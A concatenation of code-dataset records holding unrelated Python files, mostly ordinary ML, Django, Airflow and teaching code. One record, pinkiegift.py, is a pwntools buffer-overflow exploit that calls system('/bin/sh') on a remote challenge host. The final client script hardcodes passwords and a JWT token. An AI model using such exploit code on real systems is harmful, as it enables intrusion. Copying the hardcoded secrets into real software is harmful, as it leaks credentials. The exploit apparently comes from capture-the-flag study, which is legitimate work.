y_s, None, None, None\n\n else:\n x_s, a_s, y_s, x_q, a_q, y_q = [], [], [], [], [], []\n for task in task_sims:\n\n idx = list(range(self.subset_values[mode_idx]['x'][task].shape[0]))\n np.random.shuffle(idx)\n\n # idx_s = list(range((K) * (self.len_trj - self.t_steps + 1)))\n # np.random.shuffle(idx)\n #\n # idx_q = list(range((self.n_trj - K) * (self.len_trj - self.t_steps + 1)))\n # np.random.shuffle(idx)\n\n x_s.append(torch.reshape(self.subset_values[mode_idx]['x'][task][idx[:K]], (1, (K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_s])\n a_s.append(torch.reshape(self.subset_values[mode_idx]['a'][task][idx[:K]], (1, (K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_s])\n y_s.append(torch.reshape(self.subset_values[mode_idx]['y'][task][idx[:K]], (1, (K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_s])\n x_q.append(torch.reshape(self.subset_values[mode_idx]['x'][task][idx[K:]], (1, (self.n_trj - K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_q])\n a_q.append(torch.reshape(self.subset_values[mode_idx]['a'][task][idx[K:]], (1, (self.n_trj - K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_q])\n y_q.append(torch.reshape(self.subset_values[mode_idx]['y'][task][idx[K:]], (1, (self.n_trj - K) * (self.len_trj - self.t_steps + 1), -1)))#[:, idx_q])\n\n x_s = torch.cat(x_s, 0)\n a_s = torch.cat(a_s, 0)\n y_s = torch.cat(y_s, 0)\n x_q = torch.cat(x_q, 0)\n a_q = torch.cat(a_q, 0)\n y_q = torch.cat(y_q, 0)\n\n return x_s, a_s, y_s, x_q, a_q, y_q\n\n def get_batch(self, mode, N, K):\n\n if self.subset == 1:\n return self.get_subset_batch(mode, N, K)\n\n if mode == 'train':\n sims = self.training_data\n else:\n sims = self.test_data\n\n task_sims = np.random.choice(sims, N)\n\n if self.maml == 0:\n\n x_data, a_data, y_data = make_non_maml_batch(task_sims, self.read_domain, self.n_trj, self.len_trj, self.t_steps)\n\n return x_data, a_data, y_data, None, None, None\n\n x_support, a_support, y_support, x_query, a_query, y_query = make_maml_batch(task_sims, 
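# Sketch of the batching pattern in get_subset_batch() above: each task's
# trajectories are flattened to (1, samples, features) and the per-task
# tensors concatenated into an (N, samples, features) batch.
import torch

per_task = [torch.randn(5, 4, 3) for _ in range(2)]   # (trj, steps, feat)
batch = torch.cat(
    [torch.reshape(x, (1, 5 * 4, 3)) for x in per_task], dim=0
)
print(batch.shape)   # torch.Size([2, 20, 3])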
self.read_domain, self.n_trj, self.len_trj, self.t_steps, K)\n\n return x_support, a_support, y_support, x_query, a_query, y_query\n\n def get_domain(self, K):\n\n sims = self.test_data\n if self.subset:\n sims = self.subset_test_data\n\n task_sims = np.random.choice(sims, 1)\n\n if self.maml == 0:\n\n x_data, a_data, y_data = make_non_maml_batch(task_sims, self.read_domain, self.n_trj, self.len_trj, self.t_steps)\n\n return x_data, a_data, y_data, None, None, None\n\n x_support, a_support, y_support, x_query, a_query, y_query = make_maml_batch(task_sims, self.read_domain, self.n_trj, self.len_trj, self.t_steps, K)\n\n return x_support, a_support, y_support, x_query, a_query, y_query\n\n def read_domain(self, folder):\n\n if self.subset:\n last_dim = 2\n else:\n last_dim = 3\n\n data_info = self.data[folder]\n\n folder = '0'*(5-len(folder)) + folder\n data_dir = self.data_dir + '/' + folder\n\n # Load state space data\n f_pos_data = \"%s/data_pos_all.npy\" % data_dir\n f_or_data = \"%s/data_or_all.npy\" % data_dir\n f_action_data = \"%s/data_true_action_all.npy\" % data_dir\n\n # Load position data\n pos_data = np.load(f_pos_data)\n\n # Load orientation data\n or_data = np.load(f_or_data)\n\n # Load action data\n actions_data = np.load(f_action_data)\n\n n_traj = pos_data.shape[0]\n n_states_per_traj = pos_data.shape[1]\n # self.n_interactions = self.n_traj * (self.n_states_per_traj - 1)\n n_dlo_segments = int(data_info[\"dlo\"][\"length\"] * 200) # a new segment every 5mm\n n_rigid_objects = len(data_info[\"rigid_objects\"]) # number of rigid object can be taken form params file\n\n # Get position of pusher\n pusher_pos_all = np.ones((n_traj, n_states_per_traj, 1, last_dim))\n pusher_pos_all[:, :, 0, :2] = pos_data[:, :, 0] # first element in pos is pusher\n\n # Get position of segments\n seg_pos_all = np.zeros((n_traj, n_states_per_traj, self.max_len_dlo, last_dim))\n seg_pos_all[:, :, :n_dlo_segments, :2] = pos_data[:, :, 1:1+n_dlo_segments] # following ones are segment positions\n if not self.subset:\n seg_pos_all[:, :, :n_dlo_segments, 2] = 1\n\n # Get data for rigid objects\n # rigid_object_or_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n # rigid_object_pos_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n if n_rigid_objects > 0:\n rigid_object_or_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n rigid_object_pos_all = np.zeros((n_traj, n_states_per_traj, self.max_n_obj, last_dim))\n # Saved orientations are represented using quaternions.\n # We compute the euler angle around the z-axis to get a more compact representation.\n # An even better encoding is probably to split into sine and cosine of the angle (what I did here...)\n # rigid_object_or_all = np.zeros(shape=(or_data.shape[0], or_data.shape[1], n_rigid_objects, 2))\n for i in range(or_data.shape[0]):\n for j in range(or_data[i].shape[0]):\n for k in range(n_rigid_objects):\n orientation = euler_yaw_z_from_quaternion(or_data[i, j, -n_rigid_objects + k])\n or_data[i, j, k, 0] = np.sin(orientation)\n or_data[i, j, k, 1] = np.cos(orientation)\n\n rigid_object_or_all[:, :, :n_rigid_objects, :2] = or_data[:, :, :, :2]\n if not self.subset:\n rigid_object_or_all[:, :, :n_rigid_objects, 2] = 1\n\n # For the rigid objects we are interested in the positions of the bodies (might contain multiple geometries)\n # Body positions are in the second part of the pos array\n rigid_object_pos_all[:, :, :n_rigid_objects, :2] = pos_data[:, :, -n_rigid_objects:]\n if not 
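# read_domain() above pads a variable number of rigid objects into
# max_n_obj fixed slots, using a third channel as a "present" flag.
# Minimal sketch of that padding scheme:
import numpy as np

max_n_obj, n_obj = 3, 2
obj_xy = np.array([[0.1, 0.2], [0.4, 0.5]])      # (n_obj, 2)

slots = np.zeros((max_n_obj, 3))
slots[:n_obj, :2] = obj_xy
slots[:n_obj, 2] = 1.0                            # mark real objects
print(slots)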
self.subset:\n rigid_object_pos_all[:, :, :n_rigid_objects, 2] = 1\n\n if self.dlo_only != 1:\n states = np.concatenate([pusher_pos_all, seg_pos_all, rigid_object_pos_all, rigid_object_or_all], -2)\n else:\n states = np.concatenate([pusher_pos_all, seg_pos_all], -2)\n\n actions = np.zeros((n_traj, n_states_per_traj-self.t_steps, 2*self.t_steps))\n for t in range(n_states_per_traj-self.t_steps):\n actions[:, t] = np.reshape(actions_data[:, t:t+self.t_steps], (self.n_trj, -1))\n\n current_states = states[:, :(n_states_per_traj-self.t_steps)]\n next_states = states[:, self.t_steps:, :, :2]\n if self.dlo_only == 1:\n next_states = states[:, self.t_steps:, 1:(1+n_dlo_segments), :2]\n\n if self.obj_only == 1:\n next_states = states[:, self.t_steps:, (1 + n_dlo_segments):-3, :2]\n\n return current_states, next_states, actions\n\n","repo_name":"albiLo17/Meta-Dynamics","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":15874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6300411375","text":"\"\"\"Database functions that do comparisons or type conversions.\"\"\"\nfrom django.db import NotSupportedError\nfrom django.db.models.expressions import Func, Value\nfrom django.db.models.fields import TextField\nfrom django.db.models.fields.json import JSONField\nfrom django.utils.regex_helper import _lazy_re_compile\n\n\nclass Cast(Func):\n \"\"\"Coerce an expression to a new field type.\"\"\"\n\n function = \"CAST\"\n template = \"%(function)s(%(expressions)s AS %(db_type)s)\"\n\n def __init__(self, expression, output_field):\n super().__init__(expression, output_field=output_field)\n\n def as_sql(self, compiler, connection, **extra_context):\n extra_context[\"db_type\"] = self.output_field.cast_db_type(connection)\n return super().as_sql(compiler, connection, **extra_context)\n\n def as_sqlite(self, compiler, connection, **extra_context):\n db_type = self.output_field.db_type(connection)\n if db_type in {\"datetime\", \"time\"}:\n # Use strftime as datetime/time don't keep fractional seconds.\n template = \"strftime(%%s, %(expressions)s)\"\n sql, params = super().as_sql(\n compiler, connection, template=template, **extra_context\n )\n format_string = \"%H:%M:%f\" if db_type == \"time\" else \"%Y-%m-%d %H:%M:%f\"\n params.insert(0, format_string)\n return sql, params\n elif db_type == \"date\":\n template = \"date(%(expressions)s)\"\n return super().as_sql(\n compiler, connection, template=template, **extra_context\n )\n return self.as_sql(compiler, connection, **extra_context)\n\n def as_mysql(self, compiler, connection, **extra_context):\n template = None\n output_type = self.output_field.get_internal_type()\n # MySQL doesn't support explicit cast to float.\n if output_type == \"FloatField\":\n template = \"(%(expressions)s + 0.0)\"\n # MariaDB doesn't support explicit cast to JSON.\n elif output_type == \"JSONField\" and connection.mysql_is_mariadb:\n template = \"JSON_EXTRACT(%(expressions)s, '$')\"\n return self.as_sql(compiler, connection, template=template, **extra_context)\n\n def as_postgresql(self, compiler, connection, **extra_context):\n # CAST would be valid too, but the :: shortcut syntax is more readable.\n # 'expressions' is wrapped in parentheses in case it's a complex\n # expression.\n return self.as_sql(\n compiler,\n connection,\n template=\"(%(expressions)s)::%(db_type)s\",\n **extra_context,\n )\n\n def as_oracle(self, compiler, connection, **extra_context):\n if 
self.output_field.get_internal_type() == \"JSONField\":\n # Oracle doesn't support explicit cast to JSON.\n template = \"JSON_QUERY(%(expressions)s, '$')\"\n return super().as_sql(\n compiler, connection, template=template, **extra_context\n )\n return self.as_sql(compiler, connection, **extra_context)\n\n\nclass Coalesce(Func):\n \"\"\"Return, from left to right, the first non-null expression.\"\"\"\n\n function = \"COALESCE\"\n\n def __init__(self, *expressions, **extra):\n if len(expressions) < 2:\n raise ValueError(\"Coalesce must take at least two expressions\")\n super().__init__(*expressions, **extra)\n\n @property\n def empty_result_set_value(self):\n for expression in self.get_source_expressions():\n result = expression.empty_result_set_value\n if result is NotImplemented or result is not None:\n return result\n return None\n\n def as_oracle(self, compiler, connection, **extra_context):\n # Oracle prohibits mixing TextField (NCLOB) and CharField (NVARCHAR2),\n # so convert all fields to NCLOB when that type is expected.\n if self.output_field.get_internal_type() == \"TextField\":\n clone = self.copy()\n clone.set_source_expressions(\n [\n Func(expression, function=\"TO_NCLOB\")\n for expression in self.get_source_expressions()\n ]\n )\n return super(Coalesce, clone).as_sql(compiler, connection, **extra_context)\n return self.as_sql(compiler, connection, **extra_context)\n\n\nclass Collate(Func):\n function = \"COLLATE\"\n template = \"%(expressions)s %(function)s %(collation)s\"\n allowed_default = False\n # Inspired from\n # https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERS\n collation_re = _lazy_re_compile(r\"^[\\w-]+$\")\n\n def __init__(self, expression, collation):\n if not (collation and self.collation_re.match(collation)):\n raise ValueError(\"Invalid collation name: %r.\" % collation)\n self.collation = collation\n super().__init__(expression)\n\n def as_sql(self, compiler, connection, **extra_context):\n extra_context.setdefault(\"collation\", connection.ops.quote_name(self.collation))\n return super().as_sql(compiler, connection, **extra_context)\n\n\nclass Greatest(Func):\n \"\"\"\n Return the maximum expression.\n\n If any expression is null the return value is database-specific:\n On PostgreSQL, the maximum not-null expression is returned.\n On MySQL, Oracle, and SQLite, if any expression is null, null is returned.\n \"\"\"\n\n function = \"GREATEST\"\n\n def __init__(self, *expressions, **extra):\n if len(expressions) < 2:\n raise ValueError(\"Greatest must take at least two expressions\")\n super().__init__(*expressions, **extra)\n\n def as_sqlite(self, compiler, connection, **extra_context):\n \"\"\"Use the MAX function on SQLite.\"\"\"\n return super().as_sqlite(compiler, connection, function=\"MAX\", **extra_context)\n\n\nclass JSONObject(Func):\n function = \"JSON_OBJECT\"\n output_field = JSONField()\n\n def __init__(self, **fields):\n expressions = []\n for key, value in fields.items():\n expressions.extend((Value(key), value))\n super().__init__(*expressions)\n\n def as_sql(self, compiler, connection, **extra_context):\n if not connection.features.has_json_object_function:\n raise NotSupportedError(\n \"JSONObject() is not supported on this database backend.\"\n )\n return super().as_sql(compiler, connection, **extra_context)\n\n def as_postgresql(self, compiler, connection, **extra_context):\n copy = self.copy()\n copy.set_source_expressions(\n [\n Cast(expression, TextField()) if index % 2 == 0 else expression\n for 
index, expression in enumerate(copy.get_source_expressions())\n ]\n )\n return super(JSONObject, copy).as_sql(\n compiler,\n connection,\n function=\"JSONB_BUILD_OBJECT\",\n **extra_context,\n )\n\n def as_oracle(self, compiler, connection, **extra_context):\n class ArgJoiner:\n def join(self, args):\n args = [\" VALUE \".join(arg) for arg in zip(args[::2], args[1::2])]\n return \", \".join(args)\n\n return self.as_sql(\n compiler,\n connection,\n arg_joiner=ArgJoiner(),\n template=\"%(function)s(%(expressions)s RETURNING CLOB)\",\n **extra_context,\n )\n\n\nclass Least(Func):\n \"\"\"\n Return the minimum expression.\n\n If any expression is null the return value is database-specific:\n On PostgreSQL, return the minimum not-null expression.\n On MySQL, Oracle, and SQLite, if any expression is null, return null.\n \"\"\"\n\n function = \"LEAST\"\n\n def __init__(self, *expressions, **extra):\n if len(expressions) < 2:\n raise ValueError(\"Least must take at least two expressions\")\n super().__init__(*expressions, **extra)\n\n def as_sqlite(self, compiler, connection, **extra_context):\n \"\"\"Use the MIN function on SQLite.\"\"\"\n return super().as_sqlite(compiler, connection, function=\"MIN\", **extra_context)\n\n\nclass NullIf(Func):\n function = \"NULLIF\"\n arity = 2\n\n def as_oracle(self, compiler, connection, **extra_context):\n expression1 = self.get_source_expressions()[0]\n if isinstance(expression1, Value) and expression1.value is None:\n raise ValueError(\"Oracle does not allow Value(None) for expression1.\")\n return super().as_sql(compiler, connection, **extra_context)\n","repo_name":"django/django","sub_path":"django/db/models/functions/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"25749818686","text":"import torch\nfrom spikeometric.datasets.connectivity_generator import ConnectivityGenerator\n\nclass UniformGenerator(ConnectivityGenerator):\n \"\"\"\n A dataset of connectivity matrices for networks of neurons, where each matrix is generated from a\n uniform distribution over the range [low, high] and then sparsified to the specified sparsity.\n \"\"\"\n def __init__(self, n_neurons: int, low: float, high: float, sparsity: float, rng=None) -> None:\n \"\"\"Generates a dataset of uniformly distributed connectivity matrices, and saves them to the raw directory if \n they do not already exist. 
If the raw directory already exists, the dataset is loaded from the raw directory and\n \"\"\"\n self.n_neurons = n_neurons\n self.low = low\n self.high = high\n self.sparsity = sparsity\n self.rng = rng if rng is not None else torch.Generator()\n\n def generate_W0(self):\n \"\"\"Generates a single connectivity matrix W0 from a uniform distribution over the range [low, high] and then sparsifies it to the specified sparsity\"\"\"\"\"\n if (self.high - self.low) / 2 == self.high: # If the range is symmetric around zero we can use Dale's law\n half_W0 = torch.rand(size=(self.n_neurons // 2, self.n_neurons), generator=self.rng)*(self.high - self.low) + self.low # Uniform distribution over [low, high]\n half_W0[torch.rand((self.n_neurons // 2, self.n_neurons), generator=self.rng) > (1-self.sparsity)*2] = 0 \n W0 = torch.concat((half_W0 * (half_W0 > 0), half_W0 * (half_W0 < 0)), 0) # Dale's law\n W0[torch.eye(self.n_neurons, dtype=torch.bool)] = 0 # Set diagonal to zero\n else:\n W0 = torch.rand(size=(self.n_neurons, self.n_neurons), generator=self.rng)*(self.high - self.low) + self.low # Uniform distribution over [low, high]\n W0[torch.rand((self.n_neurons, self.n_neurons), generator=self.rng) > (1-self.sparsity)] = 0\n W0[torch.eye(self.n_neurons, dtype=torch.bool)] = 0 # Set diagonal to zero \n return W0\n ","repo_name":"bioAI-Oslo/Spikeometric","sub_path":"spikeometric/datasets/uniform_connectivity_generator.py","file_name":"uniform_connectivity_generator.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"72077893867","text":"print(\"hello world\")\nprint(11//3)\nprint(11%3)\n\n# hash to comment\n# atalho do teclado pro comment: ctrl + ;\n# e o undo do comment é o mesmo atalho\n\"\"\"pra passar instruções pra outres devs, usa três aspas duplas\"\"\"\n# só cuida que ainda vai ser executado, mas não vai pro front :thinking:\n\na = 2\nb = a + 1\nprint(a + b)\nprint(2 + 5)\n\n# case sensitive\ndefault_variable_fn_or_method_case = \"snake_case\"\ndefaultClassCase = \"camelCase\"\n\nprint(default_variable_fn_or_method_case)\nprint(defaultClassCase)\n\nif b // a >= 1:\n print(b)\nelse:\n print(a)\n\nsalario = 2200\naumento = 2.5\n\nPERCENT = 100\n\nsalario_final = salario + (salario * aumento / PERCENT)\nprint(salario_final)\n\nnome = \"Déborah\"\nsobrenome = \"Salves\"\n\n#concat\nprint(nome + \" \" + sobrenome)\nprint(nome, sobrenome)\n\n# Paga imposto?\nsalario = int(input(\"Digite seu salário: \"))\nimposto = True #capital pra BOOLEAN\n\nif salario > 1900 and salario < 2800:\n valor_imposto = salario * (7/100)\n # print(\"Você deve pagar um imposto? {imposto}. O valor do imposto é de {valor_imposto}\")\nelif salario >= 2800 and salario < 3700:\n valor_imposto = salario * (15/100)\nelif salario >= 3700 and salario < 4600:\n valor_imposto = salario * (15/100)\nelif salario >= 4600:\n valor_imposto = salario * (15/100)\nelse:\n imposto = False\n valor_imposto = 0\n\nprint(f\"Você deve pagar um imposto? {imposto}. 
O valor do imposto é de {valor_imposto}\")\n\n# Média de alune pra ver se foi aprovade\n\nnota1 = 7\nnota2 = 6\nnota3 = 8\nnotas = [nota1, nota2, nota3]\n\nmedia = (nota1 + nota2 + nota3) / 3\nif media >= 7:\n aprovacao = True\nelse:\n aprovacao = False\n\nprint(f\"E alune foi {'aprovado' if aprovacao else 'reprovado'}\")\n\nmedia2 = 0\ncounter = 0\nfor nota in notas:\n media2 += nota\n print(f\"media2: {media2}\")\n counter += 1\n print(f\"counter: {counter}\")\n\nmedia2 = media2/counter\nprint(f\"media2: {media2}\")\n\naprovacao2 = True if media2 >= 7 else False\n\nprint(f\"Você foi {'aprovado' if aprovacao2 else 'reprovado'}\")\n\n\n","repo_name":"deborahsalves/intro-to-python","sub_path":"aula1.py","file_name":"aula1.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22981623081","text":"from airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport os\nimport boto3\nfrom airflow.hooks.base_hook import BaseHook\nfrom io import StringIO\n\naws_conn = BaseHook.get_connection('aws_default')\ns3 = boto3.client('s3', aws_access_key_id=aws_conn.login, aws_secret_access_key=aws_conn.password)\n\nbucket = \"hexaware-inbound-bucket\"\n\n#Define default_args dictionary to pass to the DAG\ndefault_args = {\n 'owner': 'me',\n 'start_date': datetime(2023, 1, 24),\n 'depends_on_past': False,\n 'retries': 0,\n 'schedule_interval': '@daily',\n}\n\n# def s3_connect(**kwargs):\n# # Connect to AWS using the default connection\n# aws_conn = BaseHook.get_connection('aws_default')\n# # s3 = boto3.client('s3', aws_access_key_id=aws_conn.login, aws_secret_access_key=aws_conn.password)\n\n#Instantiate a DAG\ndag = DAG(\n 'data_conversion', default_args=default_args)\n\ndef sort_data(**kwargs):\n \n #Reading the csv file as a Pandas DataFrame. The file can be an excel sheet. Other libraries exist for different filetypes like pdf,docx,txt\n \n read_file = s3.get_object(Bucket=bucket, Key='unprocessed/People_data.csv')\n original_data = pd.read_csv(read_file['Body'])\n #original_data=pd.read_csv('/usr/local/airflow/dags/People_data.csv')\n key=\"Birth Date\"\n #Checking datatype of key here. 
If string convert to datetime object for sorting\n# s3_connect()\n if type(original_data.iloc[0][key])==str:\n working_data=original_data.copy()\n working_data[key]=pd.to_datetime(working_data[key])\n sorted_data=working_data.sort_values(by=key)\n print (\"This is sorted data\", sorted_data)\n \n sorted_data.to_csv('sorted_data.csv',index=False)\n csv_buffer = StringIO()\n sorted_data.to_csv(csv_buffer)\n\n response = s3.put_object(\n Body=csv_buffer.getvalue(),\n Bucket=bucket,\n Key='processed/converted.csv',\n)\n print (\"done writing data to sorted_data.csv\")\n \n # Define the task using PythonOperator\nread_and_write_task = PythonOperator(\n task_id='sort_csv',\n python_callable=sort_data,\n dag=dag)\n\n# Define the DAG structure\nread_and_write_task\n\n","repo_name":"vivekreddybokka/astro","sub_path":"sort_dag.py","file_name":"sort_dag.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33820491348","text":"import pandas as pd\nimport numpy as np\nimport os\nimport threading as td\nfrom queue import Queue\nimport multiprocessing as mp\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nimport torch\nimport torch.utils.data as Data\nimport xlsxwriter\nimport time\nfrom sklearn.preprocessing import OneHotEncoder\nCOLSIZ = 10\ntformat = lambda s: str(s).title().ljust(COLSIZ)\n\ndef spart_and_one_hot_enc(url=None,store_url=None,fname=None):\n \"\"\"\n func: separate data to Attack And Normal\n :param url: dataset file dir\n :return:None\n \"\"\"\n data1 = pd.read_pickle(url,compression='zip')\n one_hot_enc = OneHotEncoder(categories=[range(16), range(16), range(16)])\n\n data = data1.values.astype(np.float64)\n print('{} has data shaped:{}'.format(fname, data.shape))\n rows = data.shape[0]\n start = 0\n row = int(rows // 64)\n end = row*64\n source_flags = data[start:end,-1].tolist()\n a_count = 0\n n_count = 0\n atta_url = os.path.join(store_url,'{}_pure_attack.csv'.format(fname))\n norl_url = os.path.join(store_url,'{}_pure_normal.csv'.format(fname))\n print('{}'.format(' '.join(map(tformat, ('attack', 'row', 'a_count', 'n_count')))))\n\n for r in range(row):\n num = 0\n if r % 2000 == 0:\n print('{}'.format(' '.join(map(tformat,(fname,row,a_count,n_count)))))\n if 1. 
in source_flags[r*64:r*64+64]:# or 1 in source_flags[r*64:r*64+64]:\n num = 1\n dat = one_hot_enc.fit_transform(data[r * 64:r * 64 + 64, 1:4]).toarray()\n label = pd.DataFrame(source_flags[r * 64:r * 64 + 64])\n\n if num:\n # attack data\n # test point\n atta = pd.DataFrame(dat)\n\n atta = pd.concat((atta,label),axis=1)\n atta.to_csv(atta_url,sep=',',header=False,index=False,columns=None,mode='a',index_label=None,encoding='utf-8')\n a_count += 1\n else:\n # Normal data\n nor = pd.DataFrame(dat)\n\n nor = pd.concat((nor,label),axis=1)\n nor.to_csv(norl_url,sep=',',header=False,index=False,columns=None,mode='a',index_label=None,encoding='utf-8')\n n_count += 1\n\n print('{},from {} to {} acquires {} blocks,labels lengh attack|normal :{}|{},done!!!\\n'.\n format(fname, start,end,row,a_count,n_count))\n return row, a_count,n_count\n\n\nif __name__ == '__main__':\n print('start at:{}'.format(time.asctime(time.localtime(time.time()))))\n test_addr = '/home/yyd/dataset/hacking/ignore_ID_diff_time'\n res_addr = '/home/yyd/dataset/hacking/one-hot-repeat-lab'\n for i in os.listdir(test_addr):\n fname = i.split('_')[0]\n store_url = os.path.join(res_addr, fname)\n if not os.path.exists(store_url):\n os.makedirs(store_url)\n row, a_count,n_count = spart_and_one_hot_enc(os.path.join(test_addr,i),store_url,fname)\n # break\n\n for ii in os.listdir(store_url):\n if 'csv' in ii:\n pass\n else:\n continue\n ii = os.path.join(store_url,ii)\n j = os.path.splitext(ii)[0]+'.pkl'\n pd.read_csv(ii,sep=None,delimiter=',',dtype=np.float64,header=None,engine='python',encoding='utf-8').\\\n to_pickle(j,compression='zip')\n print('\\n')\n # break\n print('end at:{}'.format(time.asctime(time.localtime(time.time()))))\n","repo_name":"TerYang/repeat_lab","sub_path":"seperate_data.py","file_name":"seperate_data.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72670353066","text":"from pwn import *\nimport sys\nif len(sys.argv) < 2:\n\tdebug = True\nelse:\n\tdebug = False\n\nif debug:\n\tp = process(\"./pinkiegift\")\nelse:\n\tp = remote(\"95.179.163.167\",10006)\n\ncontext.log_level = \"debug\"\np.recvuntil(\"Santa: \")\n#gdb.attach(p,\"b *0x080485DE\\nb *0x08048607\")\ninfo = p.recvuntil(\"\\n\",drop=True)\nbinsh = int(info.split(\" \")[0],16)\nsystem_addr = int(info.split(\" \")[1],16)\ngets_addr = 0x080483D0\npayload = \"a\"*(0x84 + 4) + p32(gets_addr) + p32(system_addr) + p32(binsh) + p32(binsh)\np.sendline(\"b\")\np.sendlineafter(\"b\",payload)\np.sendline(\"/bin/sh\\x00\")\np.interactive()\n","repo_name":"davidwu1999/Pwn","sub_path":"pwn_study/problem/stack_overflow/pinkiegift/pinkiegift.py","file_name":"pinkiegift.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2562497510","text":"import requests\nimport json\nimport os\n\n\nAUTH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/\"\nREFRESH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/jwt/refresh/\"\n\nimage_path = os.path.join(os.getcwd(), \"logo.png\")\n\nheaders = {\n \"Content-Type\": \"application/json\",\n}\ndata = {\n \"username\": \"devendra\",\n \"password\": \"nokialumia\",\n}\nr = requests.post(\n AUTH_ENDPOINT,\n data=json.dumps(data),\n headers=headers\n)\ntoken = r.json()['token']\nprint(token)\n\nB_ENDPOINT = \"http://127.0.0.1:8000/api/status/\"\nENDPOINT = B_ENDPOINT + \"23/\"\n\nheaders2 = {\n # \"Content-Type\": \"application/json\",\n 
\"Authorization\": \"JWT \" + token\n}\ndata2 = {\n \"content\": \"This is new content\"\n}\n\nwith open(image_path, 'rb') as image:\n file_data = {\n 'image': image\n }\n r = requests.get(\n ENDPOINT,\n # data=data2,\n headers=headers2,\n # files=file_data,\n )\n # r = requests.post(\n # B_ENDPOINT,\n # data=data2,\n # headers=headers2,\n # files=file_data,\n # )\n print(r.text)\n\n\n# AUTH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/register/\"\n# REFRESH_ENDPOINT = \"http://127.0.0.1:8000/api/auth/jwt/refresh/\"\n# ENDPOINT = \"http://127.0.0.1:8000/api/status/\"\n\n# image_path = os.path.join(os.getcwd(), \"logo.png\")\n\n# headers = {\n# \"Content-Type\": \"application/json\",\n# \"Authorization\": \"JWT \" + 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxNCwidXNlcm5hbWUiOiJhYmMxMSIsImV4cCI6MTU4Nzk4ODAzNCwiZW1haWwiOiJhYmMxMUBzbWlsZWJvdHMuY29tIiwib3JpZ19pYXQiOjE1ODc5ODc3MzR9.1iPHVYwme1fpAN3DEnTBmObKXl7iLscmpvSlExipBzM',\n# }\n# data = {\n# \"username\": \"abc11\",\n# \"email\": \"abc11@smilebots.com\",\n# \"password\": \"nokialumia\",\n# 'password2': 'nokialumia',\n# }\n# r = requests.post(\n# AUTH_ENDPOINT,\n# data=json.dumps(data),\n# headers=headers\n# )\n# token = r.json() # ['token']\n# print(token)\n\n# headers = {\n# # \"Content-Type\": \"application/json\",\n# \"Authorization\": \"JWT \"+token,\n# }\n# with open(image_path, 'rb') as image:\n# file_data = {\n# 'image': image\n# }\n# data = {\n# 'content': 'Some random content'\n# }\n# json_data = json.dumps(data)\n# posted_response = requests.put(\n# ENDPOINT + str(32) + \"/\", data=data, headers=headers, files=file_data)\n# print(posted_response.text)\n\n\n# headers = {\n# # \"Content-Type\": \"application/json\",\n# \"Authorization\": \"JWT \"+token,\n# }\n\n# data = {\n# 'content': 'New content'\n# }\n# json_data = json.dumps(data)\n# posted_response = requests.put(\n# ENDPOINT + str(32) + \"/\", data=data, headers=headers)\n# print(posted_response.text)\n\n# refresh_data = {\n# 'token': token\n# }\n\n# new_response = requests.post(\n# REFRESH_ENDPOINT,\n# data=json.dumps(refresh_data),\n# headers=headers\n# )\n# new_token = new_response.json()\n# print(new_token)\n\n# get_endpoint = ENDPOINT + str(12)\n# post_data = json.dumps({'content': 'Some random content'})\n\n# r = requests.get(get_endpoint)\n# print(r.text)\n\n# r2 = requests.get(ENDPOINT)\n# print(r2.status_code)\n\n# post_headers = {\n# 'content-type': 'application/json'\n# }\n\n# post_response = requests.post(ENDPOINT, data=post_data, headers=post_headers)\n# print(post_response.text)\n\n\n# def do_img(method='get', data={}, is_json=True, img_path=None):\n# headers = {}\n# if is_json:\n# headers['content/type'] = 'application/json'\n# data = json.dumps(data)\n# if img_path is not None:\n# with open(image_path, 'rb') as image:\n# file_data = {\n# 'image': image\n# }\n# r = requests.request(method, ENDPOINT, data=data,\n# files=file_data, headers=headers)\n# else:\n# r = requests.request(method, ENDPOINT, data=data, headers=headers)\n# print(r.text)\n# print(r.status_code)\n# return r\n\n\n# do_img(method='post',\n# data={\"user\": 1, \"content\": \"\"},\n# is_json=False,\n# img_path=image_path)\n\n\n# def do(method='get', data={}, is_json=True):\n# headers = {}\n# if is_json:\n# headers['content/type'] = 'application/json'\n# data = json.dumps(data)\n# r = requests.request(method, ENDPOINT, data=data, headers=headers)\n# print(r.text)\n# print(r.status_code)\n# return r\n\n\n'''\nCreate\nRetrieve/List\nUpdate\nDelete\n'''\n\n# do(data={'id': 500})\n\n# 
